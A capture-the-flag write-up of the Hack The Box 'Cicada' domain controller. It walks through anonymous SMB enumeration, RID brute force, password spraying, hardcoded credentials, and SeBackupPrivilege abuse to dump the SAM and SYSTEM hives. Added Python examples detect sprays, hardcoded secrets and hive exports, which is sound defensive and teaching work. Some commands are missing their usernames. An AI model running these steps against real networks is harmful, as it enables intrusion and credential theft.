
HTB Box Writeup - Cicada

Views: 971 | 2024-10-14 19:06:11

Nmap Scan

Scan the target IP with nmap.

nmap -sT -sV -O -Pn 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.012s latency).
Not shown: 989 filtered tcp ports (no-response), 1 filtered tcp ports (host-unreach)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp?
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-14 16:35:48Z)
110/tcp open  pop3?
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running: Microsoft Windows XP|7|2012, VMware Player
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 406.91 seconds
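Read from the defender's side, the same report answers the question "what does this host expose, and what is it?". The Python below is an added example, not part of the original writeup: it parses the nmap report above into records, marks services nmap only guessed (the trailing "?"), pulls the hostname and LDAP-advertised domain out of the text, and classifies the host as a domain controller when the DNS/Kerberos/LDAP/SMB/kpasswd set is all open. The classification rule and the stripping of nmap's trailing "0." label on the LDAP domain are my assumptions.

```python
import re

# Constructed sample input: the nmap report from the scan above, pasted verbatim
# so the parser can be exercised offline.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.11.35
Host is up (0.012s latency).
Not shown: 989 filtered tcp ports (no-response), 1 filtered tcp ports (host-unreach)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp?
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-14 16:35:48Z)
110/tcp open  pop3?
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
HOST_RE = re.compile(r"Service Info: Host:\s*([^;]+);")
DOMAIN_RE = re.compile(r"Domain:\s*([^,)]+)")

# Assumed rule: this port set open together is the signature of an AD domain controller.
DC_PORTS = {53, 88, 389, 445, 464}


def parse_ports(text):
    """Return one dict per port line. A trailing '?' means nmap only guessed the service."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        ports.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service.rstrip("?"),
            "guessed": service.endswith("?"),
            "version": (version or "").strip(),
        })
    return ports


def parse_host_info(text):
    """Extract the NetBIOS host name and the DNS domain advertised over LDAP."""
    host = HOST_RE.search(text)
    domain = DOMAIN_RE.search(text)
    name = domain.group(1).strip() if domain else None
    # nmap renders the LDAP-advertised DNS name with a trailing "0." label; drop it.
    if name and name.endswith("0."):
        name = name[:-2]
    return {"hostname": host.group(1).strip() if host else None, "domain": name}


def classify_host(ports):
    open_ports = {p["port"] for p in ports if p["state"] == "open"}
    if DC_PORTS <= open_ports:
        return "domain-controller"
    if 445 in open_ports:
        return "windows-smb-host"
    return "unknown"


def exposure_report(text):
    """One triage record per scanned host: role, open ports, and services still unconfirmed."""
    ports = parse_ports(text)
    info = parse_host_info(text)
    return {
        "hostname": info["hostname"],
        "domain": info["domain"],
        "role": classify_host(ports),
        "open_ports": sorted(p["port"] for p in ports if p["state"] == "open"),
        "guessed_services": sorted(p["port"] for p in ports if p["guessed"]),
    }


if __name__ == "__main__":
    print(exposure_report(SAMPLE_NMAP))
```

The "guessed_services" list is worth keeping in an inventory: those are the ports where nmap got a response it could not fingerprint, so they deserve a second look rather than being treated as confirmed services.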

SMB Enumeration

Port 445 is open, so connect with smbclient and list the shares:

smbclient -L //10.10.11.35

Connect anonymously (null session, no password) to look at the HR share:

smbclient -N //10.10.11.35/HR

Download the notice file (its name begins "Notice from") from the share.

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Password obtained: Cicada$M6Corpb*@Lp#nZp!8

RID Brute Force

Enumerate usernames by brute-forcing RIDs with the default guest account, filtering the output for user objects (SidTypeUser):

crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"

Spray the default password against the enumerated users:

crackmapexec smb 10.10.11.35 -u -p 'Cicada$M6Corpb*@Lp#nZp!8'

User password obtained: Cicada$M6Corpb*@Lp#nZp!8
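The RID cycling and password spray above leave a distinctive trace on the domain controller: many different account names failing authentication from one source in a short window, followed (when the spray works) by a success from the same source. The Python below is an added example and not part of the writeup; it runs a sliding-window spray detector over constructed records shaped like Windows Security events 4625 (logon failure) and 4624 (logon success). The field names, source addresses, account names and times are made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events shaped like Security events 4625 / 4624. Not real log data.
SAMPLE_EVENTS = [
    {"time": "2024-10-14T16:40:01", "event_id": 4625, "user": "user01", "src_ip": "10.10.14.7", "status": "0xC000006A"},
    {"time": "2024-10-14T16:40:02", "event_id": 4625, "user": "user02", "src_ip": "10.10.14.7", "status": "0xC000006A"},
    {"time": "2024-10-14T16:40:03", "event_id": 4625, "user": "user03", "src_ip": "10.10.14.7", "status": "0xC000006A"},
    {"time": "2024-10-14T16:40:04", "event_id": 4625, "user": "user04", "src_ip": "10.10.14.7", "status": "0xC000006A"},
    {"time": "2024-10-14T16:40:05", "event_id": 4625, "user": "user05", "src_ip": "10.10.14.7", "status": "0xC000006A"},
    {"time": "2024-10-14T16:40:06", "event_id": 4625, "user": "user06", "src_ip": "10.10.14.7", "status": "0xC000006A"},
    # The one account for which the sprayed password was valid.
    {"time": "2024-10-14T16:40:07", "event_id": 4624, "user": "user07", "src_ip": "10.10.14.7", "status": "0x0"},
    # A single user mistyping a password three times is not a spray.
    {"time": "2024-10-14T16:41:10", "event_id": 4625, "user": "user20", "src_ip": "10.10.11.50", "status": "0xC000006A"},
    {"time": "2024-10-14T16:41:15", "event_id": 4625, "user": "user20", "src_ip": "10.10.11.50", "status": "0xC000006A"},
    {"time": "2024-10-14T16:41:22", "event_id": 4625, "user": "user20", "src_ip": "10.10.11.50", "status": "0xC000006A"},
]


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag each source that fails logons for at least `min_users` distinct accounts
    inside any span of length `window`. A spray tries one password against many
    users, so the distinct-user count, not the raw failure count, is the signal."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for e in events:
        if e.get("event_id") == 4625:
            failures[e["src_ip"]].append((datetime.fromisoformat(e["time"]), e["user"]))
        elif e.get("event_id") == 4624:
            successes[e["src_ip"]].append(e["user"])

    alerts = []
    for src, attempts in failures.items():
        attempts.sort()
        best_users, best_start = set(), None
        start = 0
        for end in range(len(attempts)):
            # Advance the window start until the span [start, end] fits in `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) > len(best_users):
                best_users, best_start = users, attempts[start][0]
        if len(best_users) >= min_users:
            alerts.append({
                "src_ip": src,
                "distinct_users": len(best_users),
                "failures": len(attempts),
                "window_start": best_start.isoformat(),
                # Successful logons from the same source: the spray likely found a hit.
                "later_successes": successes.get(src, []),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

Thresholds are the tuning knob: five distinct accounts in five minutes from one address is aggressive for a busy file server but reasonable for a domain controller, and the "later_successes" field is what turns a noisy alert into one worth paging on.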

enum4linux-ng Scan

Use enum4linux-ng with the obtained credentials to gather all information exposed by the SMB service:

enum4linux-ng -A -u -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10

Another user's password obtained: aRt$Lp#7t*VQ!3

Connecting to the DEV share

smbclient //10.10.11.35/DEV -U ''

Download Backup_script.ps1:

$sourceDirectory = "C:\smb"            # folder to back up
$destinationDirectory = "D:\Backup"    # where the archive is written

$username = ""                         # the username value is not present in the listing
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force   # password hardcoded in clear text
$credentials = New-Object ($username, $password)   # credential object; the type name is missing from the listing
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$"       # the variable after "$" is missing from the listing
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Password from the script: Q!3@Lp#M6b*7t*Vt
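The actual finding in Backup_script.ps1 is a credential that ConvertTo-SecureString -AsPlainText only wraps at runtime; on disk, on a share that anonymous users can read, it is clear text. As an added example (not part of the original writeup), the Python below scans PowerShell text for that pattern and a few similar ones and reports each hit with the secret masked, so the alert itself does not copy the password into a ticketing system. The pattern list, rule names and helper names are my own assumptions, not from any project.

```python
import os
import re

# Constructed sample input: the contents of Backup_script.ps1 as listed above.
SAMPLE_SCRIPT = r"""$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = ""
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object ($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
"""

# Assumed patterns for credentials written into PowerShell; group 1 captures the secret.
PATTERNS = [
    ("securestring-plaintext",
     re.compile(r"""ConvertTo-SecureString\s+["']([^"']+)["']\s+-AsPlainText""", re.IGNORECASE)),
    ("password-variable",
     re.compile(r"""\$(?:password|passwd|pwd)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)),
    ("password-parameter",
     re.compile(r"""-Password\s+["']([^"']+)["']""", re.IGNORECASE)),
]


def mask(secret, keep=2):
    """Keep the first `keep` characters so an analyst can match the finding, hide the rest."""
    return secret[:keep] + "*" * max(0, len(secret) - keep)


def scan_text(text, path="<memory>"):
    """Return one finding per matched line, with the captured secret masked."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS:
            m = rx.search(line)
            if m:
                findings.append({"path": path, "line": lineno, "rule": rule,
                                 "preview": mask(m.group(1))})
    return findings


def scan_directory(root, suffixes=(".ps1", ".psm1", ".bat", ".cmd")):
    """Walk a local copy (or a mounted share) and scan every script file in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        findings.extend(scan_text(fh.read(), path))
                except OSError:
                    continue
    return findings


if __name__ == "__main__":
    for f in scan_text(SAMPLE_SCRIPT, "Backup_script.ps1"):
        print(f"{f['path']}:{f['line']} [{f['rule']}] {f['preview']}")
```

Running this over the share contents as a scheduled job, and treating any hit as a credential to rotate rather than just a file to fix, is the mitigation the writeup's DEV share was missing; the fix on the script side is to read the credential from a secret store or a DPAPI-protected file rather than from a literal.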

WinRM Login

evil-winrm -u -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

whoami /all shows that this account holds SeBackupPrivilege and is a member of the Backup Operators group, which means it can export registry hives; export the SAM and SYSTEM hives into the temp directory (I got stuck here for half a day).

reg save hklm\sam 
reg save hklm\system 

download 
download 

I was stuck for half a day without getting it downloaded. Anyway, get it down, decrypt it to get the administrator's hash, then use evil-winrm to log in and get it.
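On the defensive side, the two things to watch for in this last step are an account being granted SeBackupPrivilege at logon and reg.exe being used to save the SAM or SYSTEM hive (a low-privilege account can do this only because of the Backup Operators membership shown above). The Python below is an added example and not from the writeup: it runs two detections over constructed records shaped like Security events 4688 (process creation) and 4672 (special privileges assigned to a new logon). Account names, paths, times and field names are made up; the set of "expected" backup accounts is whatever your environment defines.

```python
import re
import shlex

# Constructed sample telemetry shaped like Security events 4688 and 4672. Not real data.
SAMPLE_EVENTS = [
    {"event_id": 4672, "time": "2024-10-14T17:01:58", "user": r"EXAMPLE\operator1",
     "privileges": ["SeBackupPrivilege", "SeRestorePrivilege", "SeShutdownPrivilege"]},
    {"event_id": 4688, "time": "2024-10-14T17:02:10", "user": r"EXAMPLE\operator1",
     "command_line": r"reg save hklm\sam C:\Temp\sam.hive"},
    {"event_id": 4688, "time": "2024-10-14T17:02:12", "user": r"EXAMPLE\operator1",
     "command_line": r'"C:\Windows\System32\reg.exe" save HKLM\SYSTEM C:\Temp\system.hive'},
    {"event_id": 4688, "time": "2024-10-14T17:03:00", "user": r"EXAMPLE\operator1",
     "command_line": r"reg query hklm\software\microsoft\windows\currentversion\run"},
    {"event_id": 4672, "time": "2024-10-14T17:03:20", "user": r"EXAMPLE\admin1",
     "privileges": ["SeDebugPrivilege", "SeBackupPrivilege"]},
    {"event_id": 4688, "time": "2024-10-14T17:03:30", "user": r"EXAMPLE\admin1",
     "command_line": r"reg export HKLM\Software\Policies C:\Temp\policies.reg"},
]

# Hives that hold credential material; exporting any of them is worth an alert.
PROTECTED_HIVES = re.compile(r"^(?:hklm|hkey_local_machine)\\(sam|system|security)$", re.IGNORECASE)
BACKUP_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}


def hive_export(command_line):
    """Return the hive name if the command is `reg save|export <SAM|SYSTEM|SECURITY> <file>`, else None."""
    try:
        # posix=False keeps Windows backslashes literal and leaves quotes on quoted paths.
        argv = shlex.split(command_line, posix=False)
    except ValueError:
        return None
    if len(argv) < 3:
        return None
    exe = argv[0].strip('"').lower()
    if exe not in ("reg", "reg.exe") and not exe.endswith("\\reg.exe"):
        return None
    if argv[1].lower() not in ("save", "export"):
        return None
    m = PROTECTED_HIVES.match(argv[2].strip('"'))
    return m.group(1).upper() if m else None


def detect_hive_exports(events):
    """One alert per process-creation event that exports a credential-bearing hive."""
    alerts = []
    for e in events:
        if e.get("event_id") != 4688:
            continue
        hive = hive_export(e.get("command_line", ""))
        if hive:
            alerts.append({"time": e["time"], "user": e["user"], "hive": hive})
    return alerts


def unexpected_backup_privilege(events, expected_accounts):
    """Flag 4672 events that grant backup/restore privileges to accounts outside the expected set."""
    hits = []
    for e in events:
        if e.get("event_id") != 4672:
            continue
        privs = BACKUP_PRIVS & set(e.get("privileges", []))
        if privs and e["user"] not in expected_accounts:
            hits.append({"time": e["time"], "user": e["user"], "privileges": sorted(privs)})
    return hits


if __name__ == "__main__":
    for a in detect_hive_exports(SAMPLE_EVENTS):
        print("hive export:", a)
    for h in unexpected_backup_privilege(SAMPLE_EVENTS, {r"EXAMPLE\admin1"}):
        print("unexpected backup privilege:", h)
```

Command-line logging for 4688 is off by default and has to be enabled by policy, otherwise the hive export detection has nothing to match on; the 4672 check works without it and is also the place to catch the root cause, which is a regular user account sitting in Backup Operators.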